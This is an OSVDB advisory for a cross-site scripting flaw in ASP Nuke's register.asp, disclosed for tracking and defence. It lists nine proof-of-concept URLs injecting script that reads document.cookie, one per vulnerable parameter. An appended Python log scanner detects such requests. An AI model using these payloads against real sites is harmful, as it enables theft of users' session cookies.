ASP Nuke register.asp Multiple Variable XSS

2005-06-26T01:13:15
ID OSVDB:17701
Type osvdb
Reporter Alberto Trivero (trivero@jumpy.it)
Modified 2005-06-26T01:13:15

Description

Vulnerability Description

ASP Nuke contains a flaw that allows a remote cross-site scripting (XSS) attack. The flaw exists because the application does not validate several variables submitted to the register.asp script. An attacker could craft a URL that, when followed by a user, executes arbitrary script code in that user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/module/account/register/register.asp?FirstName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?LastName=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?Username=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?Password=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?Address1=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
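With no fix available, one compensating control is to watch web server logs for requests shaped like the test URLs above. The following is an added example, not part of the advisory: it flags register.asp requests where one of the nine listed parameters decodes to a value containing markup characters. The W3C-style log layout (`date time c-ip cs-method cs-uri-stem cs-uri-query sc-status`), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameter names taken from the advisory's test URLs (compared case-insensitively).
AFFECTED_PARAMS = {"firstname", "lastname", "username", "password",
                   "address1", "address2", "city", "zipcode", "email"}
# Characters needed to close an HTML attribute or open a tag.
MARKUP = re.compile(r'[<>"]')


def flagged_params(uri_stem, uri_query):
    """Return sorted names of affected parameters whose value contains markup."""
    if not uri_stem.lower().endswith("/register.asp") or uri_query == "-":
        return []
    hits = set()
    for name, value in parse_qsl(uri_query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name.lower() in AFFECTED_PARAMS and MARKUP.search(unquote(value)):
            hits.add(name)
    return sorted(hits)


def scan(log_lines):
    """Return (client_ip, flagged_parameter_names) for each suspicious line."""
    findings = []
    for line in log_lines:
        fields = line.split()
        # Skip directive lines ("#Fields: ...") and anything too short to parse.
        if line.startswith("#") or len(fields) < 7:
            continue
        params = flagged_params(fields[4], fields[5])
        if params:
            findings.append((fields[2], params))
    return findings


# Constructed sample log lines (documentation IP ranges, harmless markup).
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2005-06-27 10:00:01 192.0.2.10 GET /module/account/register/register.asp - 200",
    "2005-06-27 10:00:05 192.0.2.10 GET /module/account/register/register.asp FirstName=Anne&LastName=O%27Brien 200",
    "2005-06-27 10:02:13 198.51.100.7 GET /module/account/register/register.asp City=%22%3E%3Cb%3Etest%3C/b%3E 200",
    "2005-06-27 10:02:20 198.51.100.7 GET /module/account/register/register.asp Email=%2522%253Cb%253E&ZipCode=12345 200",
    "2005-06-27 10:03:00 203.0.113.4 GET /default.asp q=%3Cb%3E 200",
]

if __name__ == "__main__":
    for client_ip, params in scan(SAMPLE_LOG):
        print(client_ip, ",".join(params))
```

The check only sees query strings; values submitted in a POST body do not appear in this log layout and need inspection at a proxy or in the application.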

References:

Vendor URL: http://www.aspnuke.com/
Security Tracker: 1014310
Secunia Advisory ID: 15066
Related OSVDB ID: 17702
Related OSVDB ID: 17703
Related OSVDB ID: 17700
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0228.html
Keyword: M4DR007-07SA
CVE-2005-2064
Bugtraq ID: 14062